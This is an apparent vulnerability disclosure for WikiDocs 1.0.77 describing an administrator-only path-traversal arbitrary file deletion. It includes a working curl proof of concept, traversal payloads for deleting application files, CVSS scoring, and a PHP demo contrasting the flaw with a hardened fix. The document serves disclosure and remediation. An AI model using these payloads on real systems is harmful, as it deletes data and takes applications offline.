Submission #609096: Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversal

Title: Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversal
Description: The image_delete_ajax() endpoint in submit.php concatenates a user-supplied file name onto its document directory without sanitisation or canonicalisation. An authenticated administrator can therefore delete any file in a directory the web server process can write to (unlink() needs write permission on the parent directory, not on the file itself) with a plain path-traversal payload.

Affected Component
File: submit.php?act=image_delete_ajax
Function: image_delete_ajax()
Authentication: Requires session authentication level 2 (administrator)

Technical Details
The relevant excerpt of image_delete_ajax() (the document directory is created if it is missing, then the POSTed name is appended as-is):

    $document = $_POST['document'];
    $image_filename = $_POST['image_name'];
    ...
    $DOC = new Document($document);
    if(!is_dir($DOC->DIR)){
      mkdir($DOC->DIR,0755,true);
    }
    $filename = $DOC->DIR . $image_filename;   // no basename(), no realpath() containment check
    if (file_exists($filename)) {
      $image_deleted = unlink($filename);
    }

An admin can supply image_name=../../sensitive.php (or any other relative path) and have the file deleted. With an empty document parameter the base directory is the documents root, and two ../ segments reach the web root, since datasets/documents/ sits two levels below it (see the path echoed in the response below).

Proof of Concept (PoC)
1. Confirm the target file exists:

    ┌──(root㉿kali)-[/home/kali]
    └─# curl http://127.0.0.1/sitemap.xml
    <?xml version="1.0" encoding="UTF-8"?>
    <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
      <url>
        <loc>http://127.0.0.1/</loc>
        <lastmod>1970-01-01T00:00:00+00:00</lastmod>
      </url>
      <url>
        <loc>http://127.0.0.1/opt</loc>
        <lastmod>1970-01-01T00:00:00+00:00</lastmod>
      </url>
    </urlset>

2. Send the traversal payload with an administrator session cookie:

    ┌──(root㉿kali)-[/home/kali]
    └─# curl --path-as-is -i -s -k -X POST \
        -H 'Host: 127.0.0.1' \
        -H 'Origin: http://127.0.0.1' \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        -b 'PHPSESSID=e3oi7be7l9pig7s3no19brasmp' \
        --data-binary 'document=&image_name=../../sitemap.xml' \
        'http://127.0.0.1/submit.php?act=image_delete_ajax'
    HTTP/1.1 200 OK
    Date: Fri, 04 Jul 2025 08:15:44 GMT
    Server: Apache/2.4.62 (Unix)
    X-Powered-By: PHP/8.3.15
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 120
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

    {"error":null,"code":"image_deleted","file":"\/var\/www\/localhost\/htdocs\/datasets\/documents\/\/..\/..\/sitemap.xml"}

The JSON response confirms the deletion and echoes the unsanitised absolute path, which also discloses the installation directory.

3. The file is gone:

    ┌──(root㉿kali)-[/home/kali]
    └─# curl http://127.0.0.1/sitemap.xml
    <!DOCTYPE html>
    <html lang="en">
    <head>
    ... 404 page ...

Deleting application code (DoS) works the same way, for example:

    document=&image_name=../../index.php
    document=&image_name=../../classes/Session.class.php

CVSS v3.1 Assessment
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High (administrator session)
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): None
Integrity (I): Low/High (arbitrary file deletion)
Availability (A): High (application DoS)

With Integrity Low (only non-critical files deleted) the vector AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H scores 5.5; because PHP source files can be deleted, I:H is defensible, which raises the base score to 6.5. Either way the issue needs an administrator session, so it matters mainly after an admin account or session is compromised.

Application Setup
    docker run -d -p 80:80 zavy86/wikidocs

References
https://drive.google.com/drive/u/0/folders/100yv5_KxOHHqTvmMeXSquBuxafwj6sfh

Credits
Discovered by Matan Sandori
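Added example (not part of the advisory or of WikiDocs): the unsanitised join from image_delete_ajax() next to a hardened resolver that accepts only a bare file name and proves with realpath() that the canonical target stays inside the document directory, which also covers symlinks that basename() alone would miss. Function names, the temporary directory layout (htdocs/sitemap.xml and htdocs/datasets/documents/, mirroring the paths in the PoC response) and the file contents are assumptions constructed for the demo.

```php
<?php
// Added example, not WikiDocs' own code: the advisory's unsanitised join
// beside a hardened replacement that refuses traversal. The directory
// layout and file names below are constructed for the demo.
declare(strict_types=1);

/** Vulnerable: mirrors image_delete_ajax(), the name is appended as-is. */
function vulnerable_image_path(string $docDir, string $imageName): string
{
    return $docDir . $imageName;
}

/**
 * Hardened: accept only a bare file name, then prove with realpath()
 * that the canonical target still lies inside the canonical document
 * directory. Returns null when the name is unsafe, the file is missing,
 * or a symlink leads outside the directory.
 */
function safe_image_path(string $docDir, string $imageName): ?string
{
    if ($imageName === '' || str_contains($imageName, "\0")) {
        return null;
    }
    // basename() strips directories; any difference means a separator was present.
    $base = basename($imageName);
    if ($base !== $imageName || $base === '.' || $base === '..') {
        return null;
    }
    $root = realpath($docDir);
    if ($root === false) {
        return null;
    }
    $target = realpath($root . DIRECTORY_SEPARATOR . $base);
    if ($target === false) {
        return null;   // no such file (or dangling symlink)
    }
    // Containment check on canonical paths, so symlinks cannot escape either.
    if (!str_starts_with($target, $root . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $target;
}

/** Builds the constructed layout and reports what each variant resolves. */
function demo(): array
{
    $tmp    = sys_get_temp_dir() . '/wikidocs_demo_' . bin2hex(random_bytes(4));
    $htdocs = $tmp . '/htdocs';
    $docDir = $htdocs . '/datasets/documents/';   // layout from the advisory's response
    mkdir($docDir, 0755, true);
    file_put_contents($htdocs . '/sitemap.xml', '<urlset/>');
    file_put_contents($docDir . 'logo.png', 'PNG');

    $payload = '../../sitemap.xml';
    $result = [
        // Vulnerable join reaches the web root: the file exists and would be unlinked.
        'vulnerable_reaches_sitemap' => file_exists(vulnerable_image_path($docDir, $payload)),
        // Hardened resolver rejects the traversal payload ...
        'hardened_rejects_payload'   => safe_image_path($docDir, $payload) === null,
        // ... and still accepts a legitimate image name inside the directory.
        'hardened_accepts_legit'     => safe_image_path($docDir, 'logo.png') !== null,
    ];

    // Remove the constructed layout.
    unlink($htdocs . '/sitemap.xml');
    unlink($docDir . 'logo.png');
    rmdir($docDir);
    rmdir($htdocs . '/datasets');
    rmdir($htdocs);
    rmdir($tmp);
    return $result;
}

var_dump(demo());
```

Run it with PHP 8 (str_contains() and str_starts_with() are 8.0+). The returned array reports whether the vulnerable join reaches sitemap.xml, whether the hardened resolver refuses the payload, and whether it still resolves logo.png. Doing the containment check on realpath() output rather than on the raw string is what stops a symlink placed inside the documents directory from pointing the unlink() somewhere else.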
User: MatanS (UID 86894)
Submitted: 04/07/2025 10:38 (12 months ago)
Moderated: 13/07/2025 09:28 (9 days later)
Status: Accepted
VulDB Entry: 316273 [Zavy86 WikiDocs up to 1.0.77 submit.php image_drop_upload_ajax/image_delete_ajax directory traversal]
Points: 17
